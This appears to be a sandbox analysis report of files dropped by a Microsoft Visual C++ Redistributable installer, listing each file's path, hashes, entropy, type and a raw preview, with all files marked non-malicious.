                                                                        SHA-256:D14F231D1AB0D928E309B067622B5389E0DC6C4F0D3671632066F6586C442C76
                                                                        SHA-512:5BB06CA9C966C9EDD30944523A84EFD3C13B8EB9F6A5C6CFD961A0C82A1CB193E7B58BAF888DEDE7B740ED42CE76AB20C3E41A684C4DD9D818FF8B0D9E52E684
                                                                        Malicious:false
                                                                        Preview:MSCF.....!......D............................!...'..............H...P.........EU.. .concrt140.dll.P...P.....EU.. .msvcp140.dll.P.........EU.. .msvcp140_1.dll.P....c....EU.. .msvcp140_2.dll.P...@g....EU.. .msvcp140_atomic_wait.dll.P{...*....EU.. .msvcp140_codecvt_ids.dll.PS.......EU.. .vcamp140.dll.PG..0.....EU.. .vccorlib140.dll.P....@....EU.. .vcomp140.dll.P....-!...EU.. .vcruntime140.dll.P... ."...EU.. .vcruntime140_1.dll.]g.sQ3..CK.[yxT...IC.@w.@..H#A..yy.5....rB..e.e1....!..F..x....dd.}.....".I.,,....aQn.j@.B.z....}{..9.........U..:u..<W ......n. l...Mh...~....E....^.t.{{..:..=sJ......g.i..0..3.:u.5!u....&...c...A..S..~\..r.s.48...|<....;..g.........d..tt..D..3.8.q~|.......|......I.....*.{..=...]..N......s3..;x........|`(.q.o..gz.J..........S. |.@.P.7]..~..y....1THK...P!..f=."d53'Q.B..Ns.^/..6=..}r....+z..~.../{.D.DA........c..g............E!...\...@..t.b...../{Vv....mC....7y.L..6B[....A..!.p..W?..9.....V...~.x1R>.A/0.a....wF..................w.#.F.*q.Q

                                                                        C:\ProgramData\Package Cache\.unverified\vcRuntimeAdditional_x64 (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Package Cache\.unverified\vcRuntimeMinimum_x64 (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Package Cache\{CF4C347D-954E-4543-88D2-EC17F07F466F}v14.34.31931\packages\vcRuntimeMinimum_amd64\cab1.cab (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 926116 bytes, 11 files, at 0x44 +A "concrt140.dll" +A "msvcp140.dll", flags 0x4, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):936316
                                                                        Entropy (8bit):7.996550129280269
                                                                        Encrypted:true
                                                                        SSDEEP:24576:7Z6eSPpkI0D4ySp8ZMunuwOxu4qIDFAwkFu:WPOz4ySuFnu5x9hHkI
                                                                        MD5:45C9C674C0BA87F57168D6AB852E9641
                                                                        SHA1:73ACE24362F14DC58D4099DAE6E4E62902E9E950
                                                                        SHA-256:D14F231D1AB0D928E309B067622B5389E0DC6C4F0D3671632066F6586C442C76
                                                                        SHA-512:5BB06CA9C966C9EDD30944523A84EFD3C13B8EB9F6A5C6CFD961A0C82A1CB193E7B58BAF888DEDE7B740ED42CE76AB20C3E41A684C4DD9D818FF8B0D9E52E684
                                                                        Malicious:false
                                                                        Preview:MSCF.....!......D............................!...'..............H...P.........EU.. .concrt140.dll.P...P.....EU.. .msvcp140.dll.P.........EU.. .msvcp140_1.dll.P....c....EU.. .msvcp140_2.dll.P...@g....EU.. .msvcp140_atomic_wait.dll.P{...*....EU.. .msvcp140_codecvt_ids.dll.PS.......EU.. .vcamp140.dll.PG..0.....EU.. .vccorlib140.dll.P....@....EU.. .vcomp140.dll.P....-!...EU.. .vcruntime140.dll.P... ."...EU.. .vcruntime140_1.dll.]g.sQ3..CK.[yxT...IC.@w.@..H#A..yy.5....rB..e.e1....!..F..x....dd.}.....".I.,,....aQn.j@.B.z....}{..9.........U..:u..<W ......n. l...Mh...~....E....^.t.{{..:..=sJ......g.i..0..3.:u.5!u....&...c...A..S..~\..r.s.48...|<....;..g.........d..tt..D..3.8.q~|.......|......I.....*.{..=...]..N......s3..;x........|`(.q.o..gz.J..........S. |.@.P.7]..~..y....1THK...P!..f=."d53'Q.B..Ns.^/..6=..}r....+z..~.../{.D.DA........c..g............E!...\...@..t.b...../{Vv....mC....7y.L..6B[....A..!.p..W?..9.....V...~.x1R>.A/0.a....wF..................w.#.F.*q.Q

                                                                        C:\ProgramData\Package Cache\{CF4C347D-954E-4543-88D2-EC17F07F466F}v14.34.31931\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.34.31931., Template: x64;1033, Revision Number: {F4326D14-4FF5-4F81-B678-481B19EBBB51}, Create Time/Date: Thu Oct 6 00:05:28 2022, Last Saved Time/Date: Thu Oct 6 00:05:28 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.395181381426635
                                                                        Encrypted:false
                                                                        SSDEEP:3072:lviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdPa:lvipBaTDo1j//SZhP
                                                                        MD5:DF77FC41AA2F85CA423919E397084137
                                                                        SHA1:5B87CD2DFB661DF49F9557E2FC3B95C7833C9B0B
                                                                        SHA-256:51B6A928F7BECBF525CBEFF180442B05533F8EA8F8494CC97A491E29BDD4B7C2
                                                                        SHA-512:A36B093011B9534DB0881EB72DE4638E39BE67A9844B14FCD3E40539AAFD9AA9CE7B14D3968AEDB092ECF9BCA9AC0918A65F65632643782EDAFEFA36FC12C3E2
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Package Cache\{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}v14.34.31931\packages\vcRuntimeAdditional_amd64\cab1.cab (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Microsoft Cabinet archive data, many, 5681793 bytes, 14 files, at 0x44 +A "mfc140.dll" +A "mfc140chs.dll", flags 0x4, number 1, extra bytes 20 in head, 372 datablocks, 0x1 compression
                                                                        Category:dropped
                                                                        Size (bytes):5691993
                                                                        Entropy (8bit):7.997664401422205
                                                                        Encrypted:true
                                                                        SSDEEP:98304:cMnpn63ARJRnfmPh9YbStjHun8TDpd1LBEQxijqnHEWyK+bFZGujVyqXgpSMsYa1:7n6wZ4YbKHm8JTBLi+nkWSb2oVjXgpDq
                                                                        MD5:62BC0F466E65D9219281CF75C8F91380
                                                                        SHA1:0826A1591B81ACF0FE30D58E19B0A87DF2A49A3E
                                                                        SHA-256:534DD81BE6B7A23A745C36EDA87E6387C5D146C3A96C84793D0EDC7EB85B40F3
                                                                        SHA-512:17713F4228C0C2793C622BBB0A90BD5688D98A6576A695CB956FA233238C4C6E5B0CB43510BE4F072613AD575D0B44E7C847F48B785A161CC337A9E6FDCA3BB5
                                                                        Malicious:false
                                                                        Preview:MSCF......V.....D.............................V..'..............t...@.U.......EU.. .mfc140.dll.H...@.U...EU.. .mfc140chs.dll.P.....V...EU.. .mfc140cht.dll.P7...cW...EU.. .mfc140deu.dll.P...(.X...EU.. .mfc140enu.dll.P3..x.Y...EU.. .mfc140esn.dll.P7....Z...EU.. .mfc140fra.dll.P/....\...EU.. .mfc140ita.dll.P...hF]...EU.. .mfc140jpn.dll.P....+^...EU.. .mfc140kor.dll.P'...._...EU.. .mfc140rus.dll.PYV.X6`...EU.. .mfc140u.dll.Py........EU.. .mfcm140.dll.Py........EU.. .mfcm140u.dll.:G..7..CK.:kxSU.;m...M)....H.b.C[..EI \O..E........Z ...$.H8F..W....Q.BQ.....SP.Q.p91...lA.]k.sr.t.....r..k....O....,.1...@.......?.I.1.8|g"....;ty.F.,\..R......X..-]Z.<....d.e.R.s.L.....&$.Y.<>2T<se~.T.w.....9 ..d..y.......d.5z..^'|....&.......~.'Y;.y.u..|.'~.R.S......*\.r.m....?.fc^:~C^.`#-.1.#..t.~M..3..=.^.u./..0...q.?..2..|..,..\..I~D...#.n6..c.i9l..H.........l.] ..}:..W.,E:v8o.+..gv.>..u.+cX..P/.n....~.kA.....v..z-....c....jT&.OV..+..:.).XN.. .:....,...k.[...F..e..>1..E@.`..I...F.[.by!

                                                                        C:\ProgramData\Package Cache\{EAE242B1-0A26-485A-BFEB-0292EE9F03CB}v14.34.31931\packages\vcRuntimeAdditional_amd64\vc_runtimeAdditional_x64.msi (copy)

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.34.31931., Template: x64;1033, Revision Number: {4031CBD1-E566-49F4-B008-5D35253621AE}, Create Time/Date: Thu Oct 6 00:09:24 2022, Last Saved Time/Date: Thu Oct 6 00:09:24 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                        Category:dropped
                                                                        Size (bytes):184320
                                                                        Entropy (8bit):6.401455786069727
                                                                        Encrypted:false
                                                                        SSDEEP:3072:4viOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJd4a:4vipBaTDo1j//SZh4
                                                                        MD5:C214A9E931BBDD960BB48AC1A2B91945
                                                                        SHA1:A640C55DD522E01D0BE4307A5EEE9A40F779A6CC
                                                                        SHA-256:1DBD3E4E71C6678E640C289C1C64BBB12C70F65F52B27191680A9E4141D64B11
                                                                        SHA-512:D25FEF3BDD3CD18035892618602E27621E9FB3A913E7972EC7BB624D593AE4B766E718FD2E2C7342C589E9A97BEB03D2FEDEF22E824C6B539B83F199CB967933
                                                                        Malicious:false
                                                                        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                        C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):650568
                                                                        Entropy (8bit):7.222670928617801
                                                                        Encrypted:false
                                                                        SSDEEP:12288:inMwHskY7gjcjhVIEhqgM7bWvcsi6aVKrIysU40vy3W/ceKSHMsiFyY6XN2:sMysZgjS1hqgSC/izGfHjymk4HM5yJ
                                                                        MD5:848DA6B57CB8ACC151A8D64D15BA383D
                                                                        SHA1:8F4D4A1AFA9FD985C67642213B3E7CCF415591DA
                                                                        SHA-256:5A61F9775032457DB28EDD41F98F08C874E759F344EA8475C9AC8ABBBA68DE12
                                                                        SHA-512:FF8B87E7746ECF19A150874DEDD6EA4C51C76CFC291C5A80D9E5073A9BBBB2BD6ED7D10425B083578DC8D28D0D905E379FA3F919A60979E5B5C44EBC0AC613E6
                                                                        Malicious:false
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p.......?....@..............................................;..........0....(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................

                                                                        C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\state.rsm

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{52175C1E-180F-452E-83F2-4EF07DAE0BCF}\.be\VC_redist.x64.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):956
                                                                        Entropy (8bit):2.7044346396875776
                                                                        Encrypted:false
                                                                        SSDEEP:12:PZK34pgMClGttDK+xU9TbMuAttun2QERQ1qr4h6un2Q1Q1qr8:BKUgMClccTbl0W8448
                                                                        MD5:8A05B9F9D456BF6E06E16D1F4D39186B
                                                                        SHA1:D105357D1D8465E0F4FD22FB4D4DE1B6E82FC75C
                                                                        SHA-256:C1C32794DC614DD517BFCE1C201D145377275D4A20960BBBA0154D256F08A07D
                                                                        SHA-512:8FFAC930CFAF4B656CB1FD6FCDAF984C73B6FEA9E062943538BBF10F2C4D31F5B609F728BB4F7DE3620065EF3C2288678DD159A5CBDED59017BD32F3B916AF3D
                                                                        Malicious:false
                                                                        Preview:F...................................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.....................W.i.x.B.u.n.d.l.e.N.a.m.e.....B...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.2.2. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...3.4...3.1.9.3.1.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....C...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.i.s.-.8.S.T.S.I...t.m.p.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.....2...C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.i.s.-.8.S.T.S.I...t.m.p.\.........................

                                                                        C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1156
                                                                        Entropy (8bit):2.8978478940985903
                                                                        Encrypted:false
                                                                        SSDEEP:12:/ZK34pgMClGttD6+xU9m4UMzttun2QBa1Q1UMClB609Ty3Xun2Q/1Q1UMClB60R:xKUgMClccD3qSMClBj+3IqSMClB
                                                                        MD5:3E894EDF8818752C565F3BB3EADC7689
                                                                        SHA1:5865BAFEA2B47E7B31943DF74D9BAA2F85081089
                                                                        SHA-256:B511600B5F89ECFECFD6C11BD8CF3E34EE021367396D741E988F8FBF7EDFA996
                                                                        SHA-512:47131499C0E900C01B3A62A31903C525CB7B13F191B8D6B68BAF353C2F37E2D3F7AFF8F4CCEB3A99BD734CF89B7BB360920096123899391C42F30DA40829F82F
                                                                        Malicious:false
                                                                        Preview:F...............................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.........................W.i.x.B.u.n.d.l.e.N.a.m.e.....B...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.1.9. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...2.1...2.7.7.0.2.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....w...C.:.\.U.s.e.r.s.\.p.r.a.t.e.s.h.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.a.c.k.a.g.e.s.\.M.i.c.r.o.s.o.f.t...M.i.c.r.o.s.o.f.t.E.d.g.e._.8.w.e.k.y.b.3.d.8.b.b.w.e.\.T.e.m.p.S.t.a.t.e.\.D.o.w.n.l.o.a.d.s.\.v.c._.r.e.d.i.s.t...x.6.4. .(.1.)...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.....b...C.:.\.U.s.e.r.s.\.p.r.a.t.e.s.h.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.P.

                                                                        C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log

                                                                        Download File
                                                                        Process:C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe
                                                                        File Type:ASCII text, with very long lines (438), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):19250
                                                                        Entropy (8bit):5.512971661798002
                                                                        Encrypted:false
                                                                        SSDEEP:192:N6ygWnl1g1O1d1Z1+1M1T1UeQpZ14/sopEuQjNjxjs2psZTOMsMJrLdV2aIDF6:4yryeQpZ18QhFWjVV2a2F6
                                                                        MD5:418FEE906B33302A2C52136B469FA2B8
                                                                        SHA1:4A5995E340294A80564873465F9F0B1D7232C4CA
                                                                        SHA-256:019FE0508AA2A7A4630C7FA76379E52EAADC85760234D708D3F1564BD32445C4
                                                                        SHA-512:E720041087780868E633E7D655EB86824A5F1A2478DCE3D621AEA230453BDEEAA5513E1D634048A04D8CA7DE520A1A96EBF9534711EC574BAD311A9027934AD7
                                                                        Malicious:false
                                                                        Preview:[14FC:11B4][2023-01-02T15:34:49]i001: Burn v3.10.4.4718, Windows v10.0 (Build 17134: Service Pack 0), path: C:\Windows\Temp\{22FC44A3-9D0C-4078-AD49-1FDAE23A881A}\.cr\VC_redist.x64.exe..[14FC:11B4][2023-01-02T15:34:50]i009: Command Line: '-burn.clean.room=C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe -burn.filehandle.attached=588 -burn.filehandle.self=628 /install /quiet'..[14FC:11B4][2023-01-02T15:34:50]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\VC_redist.x64.exe'..[14FC:11B4][2023-01-02T15:34:50]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\AppData\Local\Temp\is-8STSI.tmp\'..[14FC:11B4][2023-01-02T15:34:54]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454.log'..[14FC:11B4][2023-01-02T15:34:54]i000: Setting string variable 'WixBundleName' to value 'Microsoft Visual C++ 2015-

                                                                        C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454_000_vcRuntimeMinimum_x64.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):240258
                                                                        Entropy (8bit):3.8206617818669906
                                                                        Encrypted:false
                                                                        SSDEEP:3072:kY45dEjj/DDDDDDDD2ICsjG/HHHHHHHHHHtr2RuhHO0sDGBXw:7jHjh
                                                                        MD5:0EB7F01D2B97F1BA524029E46782373A
                                                                        SHA1:1B517F4C36D1BFD8CF2DA1C84CEA41FD8318AC64
                                                                        SHA-256:D98F4C940C5CA1058AD562BB4E8E59A46FC4B1C19D08357AA582B668EA4125AC
                                                                        SHA-512:7F5C3219A0AD0AF1D9CC1EAFCEEE39AB3B958AEFAEB4FA40D7D20BB6BEDBE50BB84C77D272D1370AC1E30A58BEA36C348BABAA2C4E9AF15A1F6305F46D99CE43
                                                                        Malicious:false
                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1./.2./.2.0.2.3. . .1.5.:.3.4.:.5.9. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.5.2.1.7.5.C.1.E.-.1.8.0.F.-.4.5.2.E.-.8.3.F.2.-.4.E.F.0.7.D.A.E.0.B.C.F.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.5.C.:.8.4.). .[.1.5.:.3.4.:.5.9.:.1.1.7.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.5.C.:.8.4.). .[.1.5.:.3.4.:.5.9.:.1.1.7.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.5.C.:.8.4.). .[.1.5.:.3.4.:.5.9.:.1.1.7.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.C.F.4.C.3.4.7.D.-.9.5.4.E.-.4.5.4.3.-.8.8.D.2.-.E.C.1.7.F.0.7.F.4.6.6.F.}.v.1.4...3.4...3.1.9.3.1.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.M.i.

                                                                        C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153454_001_vcRuntimeAdditional_x64.log

                                                                        Download File
                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):266728
                                                                        Entropy (8bit):3.829195679668369
                                                                        Encrypted:false
                                                                        SSDEEP:3072:Ndpxh7KjvHgWXXXXXXXXXXXXXZ+9jOE2RRRRRRRRRRRRRnFtpnug+DPOOJUNtR8m:Ijoje
                                                                        MD5:3E14DC8FB1B909CBD391455CAA070505
                                                                        SHA1:2241AA6D5F20C2FC6BEEEEB7929DB97384BE2FAC
                                                                        SHA-256:1B3BD1A309C4BDDF1F298C369C054954A6599FDD9777A5041F6BF6A7C8304D05
                                                                        SHA-512:34A719E466A51384F06C5E235381028827FAB296807856E2A631F4EDC5F819DBA300CB44E74FE54C099E6F30668EB4E6FBF44C9A93E3B34835BAD5EF6923A8FF
                                                                        Malicious:false
                                                                        Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .1./.2./.2.0.2.3. . .1.5.:.3.5.:.1.7. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.{.5.2.1.7.5.C.1.E.-.1.8.0.F.-.4.5.2.E.-.8.3.F.2.-.4.E.F.0.7.D.A.E.0.B.C.F.}.\...b.e.\.V.C._.r.e.d.i.s.t...x.6.4...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.5.C.:.7.4.). .[.1.5.:.3.5.:.1.7.:.3.2.0.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.5.C.:.7.4.). .[.1.5.:.3.5.:.1.7.:.3.2.0.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.5.C.:.7.4.). .[.1.5.:.3.5.:.1.7.:.3.2.0.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.P.a.c.k.a.g.e. .C.a.c.h.e.\.{.E.A.E.2.4.2.B.1.-.0.A.2.6.-.4.8.5.A.-.B.F.E.B.-.0.2.9.2.E.E.9.F.0.3.C.B.}.v.1.4...3.4...3.1.9.3.1.\.p.a.c.k.a.g.e.s.\.v.c.R.u.n.t.i.m.e.A.d.

                                                                        C:\Users\user\AppData\Local\Temp\dd_vcredist_amd64_20230102153526.log

                                                                        Download File
                                                                        Process:C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
                                                                        File Type:ASCII text, with very long lines (443), with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):12697
                                                                        Entropy (8bit):5.435090951591286
                                                                        Encrypted:false
                                                                        SSDEEP:192:GAN4CnvD1g1O1d1Z1+1M1T1SnFSrS38FLeFi:GO3fG3meg
                                                                        MD5:D90BEB92CB0F641A758FB7F7C33451CC
                                                                        SHA1:411BD200C0D4AE7EC3DBE50188AA71F43667E519
                                                                        SHA-256:D62638C6FDDCE52C44B42FD758FEB92DCB2568C3139FD1428675A52FBFB9DD6C
                                                                        SHA-512:93910E5D4647EDA5F6078F9B27C4A9D64D5C9F4A469AD4777DABEEFFC3FC55E8E7F6F87BF3786AEF08CF38A9D5CA4B6862A25C1AEB0DEB25BF7100A54CAD8ABC
                                                                        Malicious:false
